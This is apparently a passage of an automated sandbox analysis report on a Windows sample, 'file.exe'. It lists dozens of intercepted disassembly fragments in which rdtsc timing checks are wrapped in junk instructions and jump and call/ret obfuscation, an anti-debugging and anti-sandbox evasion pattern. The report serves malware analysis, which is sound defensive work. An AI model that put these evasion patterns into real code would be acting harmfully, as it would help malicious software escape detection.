                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A425BC second address: A425C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A425C1 second address: A425D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0E6551CA36h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A425D4 second address: A425EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6082h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A425EA second address: A4262C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F0E6551CA3Ah 0x00000012 push 00000000h 0x00000014 jmp 00007F0E6551CA43h 0x00000019 push 0CE451C5h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0E6551CA3Fh 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4276F second address: A427A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push 00000000h 0x0000000d jng 00007F0E647B607Ch 0x00000013 call 00007F0E647B6079h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0E647B6084h 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A427A7 second address: A427AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A427AD second address: A427B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A427B1 second address: A42803 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA3Fh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0E6551CA48h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F0E6551CA43h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42803 second address: A42807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54292 second address: A54297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60754 second address: A60758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60758 second address: A6075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6075E second address: A60773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E647B607Dh 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60773 second address: A607A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA40h 0x00000007 jo 00007F0E6551CA36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E6551CA41h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A608F3 second address: A608FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60A41 second address: A60A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA3Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60A5C second address: A60A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60A62 second address: A60A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60BD7 second address: A60BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60BDF second address: A60BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0E6551CA36h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60D56 second address: A60D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60D5A second address: A60D64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60D64 second address: A60D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60D6B second address: A60D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58FE9 second address: A58FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58FED second address: A58FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A617BC second address: A617C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A617C0 second address: A617EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E6551CA3Bh 0x0000000d jmp 00007F0E6551CA47h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61D92 second address: A61DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F0E647B607Ch 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61DA3 second address: A61DAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61EFD second address: A61F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ch 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007F0E647B607Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61F24 second address: A61F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62094 second address: A620A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6225A second address: A62260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62260 second address: A62264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62572 second address: A625B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F0E6551CA36h 0x0000000b popad 0x0000000c jmp 00007F0E6551CA43h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F0E6551CA42h 0x00000019 push ecx 0x0000001a jmp 00007F0E6551CA3Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A652A5 second address: A652AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653EC second address: A653F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A653F0 second address: A6541F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0E647B607Ch 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63C2D second address: A63C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63C33 second address: A63C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A667AF second address: A667B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A667B3 second address: A667BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E647B6076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A667BF second address: A667E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E6551CA36h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CE16 second address: A6CE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D3B8 second address: A6D3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D3C0 second address: A6D3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D3C6 second address: A6D3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA3Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6EF8D second address: A6EF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F4C3 second address: A6F4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F4C7 second address: A6F4CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5A0 second address: A6F5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0E6551CA36h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5B3 second address: A6F5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5BB second address: A6F5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FB72 second address: A6FB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7169E second address: A716F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA38h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0E6551CA38h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jmp 00007F0E6551CA44h 0x00000030 push 00000000h 0x00000032 cld 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jne 00007F0E6551CA36h 0x0000003f popad 0x00000040 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D98 second address: A70D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72EC9 second address: A72F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 je 00007F0E6551CA38h 0x0000000c mov edi, esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0E6551CA38h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push ecx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f adc di, 05DDh 0x00000034 pop edi 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72F0E second address: A72F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6081h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72BE7 second address: A72BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72BED second address: A72BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76505 second address: A7651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7651E second address: A76523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7632D second address: A76331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76523 second address: A76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76529 second address: A76571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 or dword ptr [ebp+122D3256h], ecx 0x0000000e push 00000000h 0x00000010 add esi, 10F38BB1h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F0E6551CA38h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 or edi, dword ptr [ebp+122D35C7h] 0x00000038 mov edi, dword ptr [ebp+1245868Eh] 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 push edi 0x00000043 pop edi 0x00000044 pop ecx 0x00000045 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76DF1 second address: A76DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BAA5 second address: A7BAAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DFB6 second address: A7DFDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6080h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E1CD second address: A7E1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E1D3 second address: A7E1D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F29E second address: A7F2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Dh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82334 second address: A8235F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0E647B6087h 0x0000000f jl 00007F0E647B6076h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A833BA second address: A833BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85183 second address: A8518B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A833BE second address: A8342A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F0E6551CA42h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 add bl, FFFFFFC6h 0x00000024 mov di, bx 0x00000027 mov eax, dword ptr [ebp+122D01DDh] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0E6551CA38h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 adc ebx, 48EC3E00h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 jno 00007F0E6551CA38h 0x00000058 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8243D second address: A82441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85791 second address: A857F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F0E6551CA3Ch 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0E6551CA38h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, 64C17C00h 0x00000033 or dword ptr [ebp+122D37D8h], ecx 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D1D02h], edi 0x00000041 mov ebx, dword ptr [ebp+122D22B6h] 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 jng 00007F0E6551CA38h 0x0000004f push esi 0x00000050 pop esi 0x00000051 pop eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82441 second address: A82468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0E647B6078h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E647B6085h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A857F1 second address: A857F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82468 second address: A8246E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8661D second address: A86621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86621 second address: A86627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87703 second address: A87709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87709 second address: A8773C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F0E647B6088h 0x0000000e jmp 00007F0E647B6082h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E647B6081h 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A6A0 second address: A8A6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A6A4 second address: A8A6AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A6AE second address: A8A6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86837 second address: A868E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov dword ptr [ebp+122D39B1h], edi 0x00000012 pop edi 0x00000013 adc cl, 00000031h 0x00000016 popad 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F0E647B6078h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 or dword ptr [ebp+122D2042h], ecx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 add dword ptr [ebp+122D3C09h], ecx 0x0000004b mov eax, dword ptr [ebp+122D0E31h] 0x00000051 mov dword ptr [ebp+122D3575h], ecx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c call 00007F0E647B6078h 0x00000061 pop eax 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 add dword ptr [esp+04h], 0000001Dh 0x0000006e inc eax 0x0000006f push eax 0x00000070 ret 